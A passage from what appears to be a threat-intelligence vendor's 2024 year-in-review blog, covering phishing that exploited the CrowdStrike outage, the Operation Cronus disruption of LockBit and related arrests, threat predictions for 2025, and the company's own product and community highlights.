On July 19th, CrowdStrike pushed a detection update to its Falcon sensors. This update included a problematic configuration file that caused the Windows operating system to crash, causing users to observe the blue screen of death. Computers experiencing the blue screen of death caused this outage, which led to business disruptions as the impacted organization no longer had access to its devices.
Threat actors quickly took advantage of the situation by registering domains for phishing attempts. These phishing scams capitalized on the outage and operated by offering recovery software or processes in exchange for money. The goal was to get users to send the money or deploy malware.
Figure 9: IOCs related to the CrowdStrike BSOD incident can be found using the explore query threat=“Crowdstrike BSOD Impersonation”.
Figure 10: Banner placed on LockBit site after Operation Cronus. Source: Trend Micro
In February 2024, law enforcement agencies disrupted LockBit operations through Operation Cronus. This multi-agency investigation resulted in the freezing of over 200 cryptocurrency accounts tied to LockBit and the UK’s National Crime Agency (NCA) taking over the group's infrastructure. The investigation also led to the publication of details about the group using the seized infrastructure.
Figure 11: Results of Operation Cronus. Source: EuropolFigure: Law enforcement using LockBit's Data Leak Site to announce the disruption operation. Source: Trend Micro
Authorities also made decryption keys available, which helped victims of LockBit with recovery efforts. The decryption tool is available through NoMoreRansom.
In addition to the takedown efforts in February, the US Department of Justice announced charges against Rostislav Panev, a Russian and Israeli national, who was arrested in Israel on December 20, 2024. The DOJ press release indicated that Panev was responsible for developing the LockBit ransomware and maintaining technical infrastructure. The DOJ has also indicted Dmitry Yuryevich Khoroshev, who is thought to be LockBitSupp, the persona used by LockBit to communicate on forums such as XSS.IS.
While LockBit appeared to recover from Operation Cronus and was able to deploy ransomware at organizations throughout the year, the arrest of its developer may impact future operations. While the takedown of technical infrastructure benefits defenders and such law enforcement action should be applauded, arresting those behind these groups will significantly disrupt operations.
💡
For a recap of 2024’s cyber trends, we recommend reading BushidoToken’s “Top 10 Cyber Threats of 2024” blog.
We expect 2025 to be similar to 2024 regarding the types of threats defenders will have to deal with. Threat actors will continue to target public-facing applications and servers, and prioritizing patching these applications will become increasingly important. However, solely relying on patch management will not be sufficient, and a layered defensive approach is required to mitigate risks. This includes host—and network-based monitoring to identify anomalous processes and the traffic related to these applications.
Remote management and monitoring (RMM) tools were heavily abused in 2024, continuing the trend from prior years. These tools allowed threat actors to access environments and establish persistence while blending in. The use of tools already present within a victim’s environment will continue, requiring defenders to track tool usage and deploy policies through device management solutions to restrict access to authorized applications.
Finally, generative AI (Gen AI) is another avenue we expect threat actors to abuse heavily in 2025. We anticipate threat actors using Gen AI to create more effective social engineering lures and aid in developing malicious tools.
Pulsedive Rewind
As we close out the year, we also wanted to share a few of our highlights. In 2024, we strengthened our infrastructure and capabilities across our products. We were energized by our community of Pulsedive users and clients - some of whom we were lucky to meet at various events throughout the year. Check out what our team was up to, plus some of our favorite moments below.
New and Favorite Integrations
We added integrations with OpenCTI, ServiceNow, and Torq.
Your favorite integrations? Palo Alto Cortex XSOAR, Cisco SecureX, SpiderFoot, Tines, and pfSense pfBlockerNG.
Top Blogs
Our CyberChef tutorial and example walkthrough quickly became top blog. We hear you: expect more helpful guides on free resources and tools in 2025.
Threat Research: Loaders, Stealers, Ransomware, and More
With an unending cycle of threats, news, and vulnerabilities, it’s hard to stay on top of every development. We focused on providing clear summaries with unique insights to help analysts and researchers stay in the know. Here’s which threats piqued your interest the most:
This year, we presented our research on sharing at the SANS CTI Summit, volunteered in our local community’s SECONNJ and Alice in Cyberspace conferences, pulled back the curtains to share stories about the realities of bootstrapping at BSidesNYC, served on the CFP review panel for Cyberjutsu, donated licenses for live NOC demonstrations with our partner Cisco at BlackHat and RSA, and more. It’s always an amazing time meeting with users and clients from all over the world. Two of our recorded talks include:
In 2024, our team released improvements to our free add-on, introduced MFA to all users, improved our scanning infrastructure, updated our STIX/TAXII docs, and a bunch more in the backend. Up next, you can expect improvements to scanning performance, risk scoring, searchable properties, and downloadable content from scans.
We can’t say it enough: feedback from our community keeps us motivated and committed to making Pulsedive better every year. When we get messages out of the blue like “I just want to send a HUGE thank you and congratulations to all of the team that built and maintains this awesome platform!” and “You folks are great, thanks for being such a wonderful group in the Intel space”, it continues to solidify why we do what we do, and how we do it every day.
We thank you from the bottom of our hearts for your support and for being part of our journey. On to 2025.
Entrar
